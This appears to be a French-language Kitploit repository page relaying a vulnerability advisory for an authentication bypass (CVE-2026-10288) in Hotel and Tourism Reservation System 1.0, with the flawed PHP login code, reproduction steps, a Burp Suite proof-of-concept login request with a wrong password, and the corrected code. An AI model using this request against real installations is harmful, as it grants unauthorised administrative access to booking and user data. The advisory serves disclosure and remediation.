Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10288-AUTH-BYPASS | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-10288-auth-bypass
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentification
GitHubxmyronn/cve-2026-10288-auth-bypass

CVE-2026-10288-AUTH-BYPASS

Voir le dépôt
il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Hotel and Tourism Reservation System - Contournement d'authentification

Détails de la vulnérabilité

ChampDétails
TitreHotel and Tourism Reservation System - Contournement d'authentification
Éditeurcode-projects.org
ProduitHotel and Tourism Reservation System
Version1.0
Type de vulnérabilitéAuthentification incorrecte
CWECWE-287
Score CVSS9.0 (Critique)
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fichier concerné/admin/login.php
Authentification requiseNon
Exploitable à distanceOui

Description

Une vulnérabilité critique de contournement d'authentification existe dans la fonctionnalité de connexion administrateur de Hotel and Tourism Reservation System 1.0. La vulnérabilité est causée par un contrôle conditionnel inversé sur la valeur de retour de password_verify(), ce qui amène l'application à accorder l'accès lorsqu'un mot de passe incorrect est fourni et à refuser l'accès lorsque le mot de passe correct est fourni. Un attaquant distant non authentifié peut obtenir un accès administratif complet en fournissant une adresse e-mail valide et n'importe quel mot de passe incorrect.


Cause racine

Fichier : admin/login.php — lignes 39 à 46

root@kitploit:~
if(password_verify($password, $user['password'])){
    // BUG: password_verify() returns TRUE when password is CORRECT
    // but the error message is placed here instead of login logic
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
} else {
    // BUG: this block executes when password is WRONG
    // but login is granted here instead of showing an error
    $userID = $user['id'];
    login($userID);
}

password_verify() renvoie true lorsque le mot de passe fourni correspond au hachage. Le développeur a placé la logique de réussite dans la branche else (qui s'exécute lorsque la fonction renvoie false), ce qui signifie que l'authentification est accordée pour tout mot de passe incorrect.


Impact

Un attaquant distant non authentifié peut :

  • Obtenir un accès administratif complet à l'application
  • Consulter, modifier et supprimer toutes les réservations de chambres et de circuits touristiques
  • Ajouter, modifier ou supprimer des chambres, des circuits et des événements
  • Accéder à toutes les données des utilisateurs enregistrés
  • Effectuer toutes les opérations d'administration sans connaître le mot de passe administrateur

Étapes de reproduction

Configuration : installez Hotel and Tourism Reservation System 1.0 sur XAMPP. Accédez à l'application à l'adresse http://localhost/ht/.

Étape 1 : accédez à la page de connexion administrateur.

http:///ht/admin/login.php

Étape 2 : saisissez une adresse e-mail administrateur valide avec un mot de passe incorrect quelconque.

E-mail : [email protected] Mot de passe : wrongpassword

Étape 3 : cliquez sur Connexion.

Résultat : l'application contourne l'authentification et redirige vers le tableau de bord administrateur (index.php) — un accès administrateur complet est accordé avec un mot de passe incorrect.


Preuve de concept (Burp Suite)

Requête :

root@kitploit:~
POST /ht/admin/login.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

email=admin%40admin.com&password=test1234&login=Login

Réponse :

root@kitploit:~
HTTP/1.1 302 Found
Location: index.php

Une redirection 302 vers index.php confirme une authentification réussie avec un mot de passe incorrect.


Captures d'écran

1. Page de connexion — mot de passe incorrect saisi

Screenshot 2026-05-11 232154

2. Burp Suite — la redirection 302 confirme le contournement

Screenshot 2026-05-11 232205

3. Code source — logique inversée

Screenshot 2026-05-11 232228

Correctif recommandé

Échangez les branches conditionnelles afin que la connexion soit accordée lorsque password_verify() renvoie true :

root@kitploit:~
// FIXED
if(password_verify($password, $user['password'])){
    $userID = $user['id'];
    login($userID);
} else {
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
}

Références

  • CWE-287 : Authentification incorrecte
  • Hotel and Tourism Reservation System — code-projects.org

Découvert par

Imad Alvi — Chercheur indépendant en sécurité

Télécharger l’outil